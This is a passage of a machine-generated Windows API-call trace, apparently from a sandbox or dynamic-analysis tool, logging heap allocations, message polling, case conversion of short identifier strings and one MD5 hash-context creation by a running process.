wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.649] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.649] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.649] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.650] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0198.650] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.650] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.650] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.650] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.650] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0198.650] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0198.650] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0198.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0198.651] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0198.651] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0198.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.652] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0198.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0198.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0198.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0198.652] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0198.652] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0198.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0198.652] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0198.652] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.652] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.653] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.653] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.653] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.653] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.653] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.660] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0198.660] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.660] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0198.660] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.660] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0198.660] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0198.661] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.661] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0198.661] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.661] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.661] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.662] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.662] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.662] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.662] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.662] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.662] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.663] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.663] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.663] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0198.663] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.663] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.663] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.664] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.664] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.664] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0198.664] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0198.664] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.664] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0198.664] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.664] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0198.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.665] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.665] CryptCreateHash (in: hProv=0xad6480, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0198.665] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.665] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.666] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.666] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.666] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.666] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0198.667] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0198.667] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0198.667] RtlAllocateHeap (HeapHandle=0x25c0000, 